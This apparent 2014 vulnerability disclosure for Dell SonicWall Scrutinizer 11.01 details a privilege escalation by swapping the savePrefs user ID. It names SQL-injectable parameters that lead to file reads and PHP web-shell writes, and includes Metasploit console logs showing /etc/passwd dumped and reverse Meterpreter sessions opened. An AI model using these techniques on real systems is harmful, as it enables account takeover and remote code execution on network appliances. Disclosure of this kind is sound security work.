Skip to content

Instantly share code, notes, and snippets.

@brandonprry

brandonprry/gist:36b4b8df1cde279a9305

Created July 10, 2014 16:12
Show Gist options
  • Save brandonprry/36b4b8df1cde279a9305 to your computer and use it in GitHub Desktop.
Save brandonprry/36b4b8df1cde279a9305 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
gistfile1.txt
Dell Scrutinizer 11.01 several vulnerabilities
http://www.mysonicwall.com has a trial available.
Dell Sonicwall Scrutinizer suffers from several SQL injections, many of which can end up with
remote code execution. An attacker needs to be authenticated, but not as an administrator.
However, that wouldn’t stop anyone since there is also a privilege escalation vulnerability in that
any authenticated user can change any other user’s password, including the admin. One SQL
injection, which a Metasploit module was provided for, requires this privilege escalation to reach
since it exists in the new user mechanism only available to admins.
Privilege escalation via password change mechanism
———————————————————-
When changing you password, you POST a request with a savePrefs variable. This variable is
actually the id of the user whose password is being changed. By changing it to ‘1’, for instance,
you will change the password for the person with an ID of 1 (which is always admin as far as I
can tell).
SQL injection in new user mechanism (requires admin)
————————————————————-
When creating a new user, the selectedUserGroup variable POSTed to /cgi-bin/admin.cgi is
vulnerable to SQL injection that allows an attacker to read an arbitrary file from the FS.
A Metasploit module was provided that exploits the above two vulnerabilities to escalate an
arbitrary authenticated user to admin, which then will read /etc/passwd via the SQL injection.
See auxiliary module scrutinizer_password_change.rb.
msf auxiliary(scrutinizer_password_change) > show options
Module options (auxiliary/gather/scrutinizer_password_change):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME /etc/passwd yes The file to read from the admin sqli
PASSWORD password no The password to authenticate with
Proxies no Use a proxy chain
RHOST 192.168.1.99 yes The target address
RPORT 80 yes The target port
TARGETURI / yes Base Application path
USERID 1 yes The ID of the user to have their password changed. 'admin' is
always 1.
USERNAME username no The username to authenticate as
VHOST no HTTP server virtual host
msf auxiliary(scrutinizer_password_change) > run
[+] Log in with the user's name and the password 'passw0rd!'
[+] Attempting to read file using 'admin' account: /etc/passwd
[+] root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin!operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
plixer:x:500:500::/home/plixer:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rtkit:x:499:498:RealtimeKit:/proc:/sbin/nologin
pulse:x:498:497:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
[*] Auxiliary module execution completed
msf auxiliary(scrutinizer_password_change) >
Within the appliance, you may see /home/plixer/scrutinizer/html/d4d/exporters.php. This script,
which is used actively throughout the web UI, is riddled with SQL injections. You can read the
file and see the way the programmer(s?) is building their SQL injections. I will detail some of the
injections that I could exploit and achieve RCE with (with Metasploit modules).
The changeUnit function is vulnerable to a UNION-based SQL injection in the user_id parameter
which allows a remote user to write a file to the filesystem via the OUTFILE vector. We have
write permissions on the folder from the sql injection, so a PHP script can be written to /home/
plixer/scrutinizer/html/d4d/ and the code will be executed upon a GET. A metasploit module was
provided for this. (see scrutinizer_changeunit_sqli_exec.rb)
msf exploit(scrutinizer_changeunit_sqli_exec) > set RHOST 192.168.1.99
RHOST => 192.168.1.99
msf exploit(scrutinizer_changeunit_sqli_exec) > set USERNAME username
USERNAME => username
msf exploit(scrutinizer_changeunit_sqli_exec) > set PASSWORD password
PASSWORD => password
msf exploit(scrutinizer_changeunit_sqli_exec) > exploit
[*] Started reverse handler on 192.168.1.31:4444
[*] Sending stage (39848 bytes) to 192.168.1.99
[*] Meterpreter session 3 opened (192.168.1.31:4444 -> 192.168.1.99:55077) at 2014-04-20
12:18:22 -0500
[+] Deleted /home/plixer/scrutinizer/html/d4d/q0Oe8orPuCgoBAgk.php
meterpreter > sysinfo
Computer : fdsafds
OS : Linux fdsafds 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013
x86_64
Meterpreter : php/php
meterpreter >
The methodDetail function is vulnerable to a UNION-based SQL injection similar to the one
above. The methodDetail parameter itself is what is vulnerable. A metasploit module that
achieves RCE via this vector has been supplied. ( see scrutinizer_methoddetail_sqli_exec.rb)
msf exploit(scrutinizer_methoddetail_sqli_exec) > set USERNAME username
USERNAME => username
msf exploit(scrutinizer_methoddetail_sqli_exec) > set PASSWORD password
PASSWORD => password
msf exploit(scrutinizer_methoddetail_sqli_exec) > set RHOST 192.168.1.99
RHOST => 192.168.1.99
msf exploit(scrutinizer_methoddetail_sqli_exec) > exploit
!
[*] Started reverse handler on 192.168.1.31:4444
[*] Sending stage (39848 bytes) to 192.168.1.99
[*] Meterpreter session 2 opened (192.168.1.31:4444 -> 192.168.1.99:55063) at 2014-04-20
12:16:23 -0500
[+] Deleted /home/plixer/scrutinizer/html/d4d/6QOILiKezqXHEU07.php
meterpreter > sysinfo
Computer : fdsafds
OS : Linux fdsafds 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013
x86_64
Meterpreter : php/php
meterpreter >
The xcNetworkDetail function is vulnerable to a UNION-based SQL injection like the ones
above. The xcNetworkDetail parameter is itself what is vulnerable. A metasploit module was
provided for this. (see scrutinizer_xcnetworkdetail_sqli_exec.rb)
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > set RHOST 192.168.1.99
RHOST => 192.168.1.99
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > set USERNAME username
USERNAME => username
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > set PASSWORD password
PASSWORD => password
msf exploit(scrutinizer_xcnetworkdetail_sqli_exec) > exploit
[*] Started reverse handler on 192.168.1.31:4444
[*] Sending stage (39848 bytes) to 192.168.1.99
[*] Meterpreter session 1 opened (192.168.1.31:4444 -> 192.168.1.99:55045) at 2014-04-20
12:14:57 -0500
[+] Deleted /home/plixer/scrutinizer/html/d4d/AJ7W4nC4TOpLuS4F.php
meterpreter > sysinfo
Computer : fdsafds
OS : Linux fdsafds 2.6.32-358.11.1.el6.x86_64 #1 SMP Wed Jun 12 03:34:52 UTC 2013
x86_64
Meterpreter : php/php
meterpreter >
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment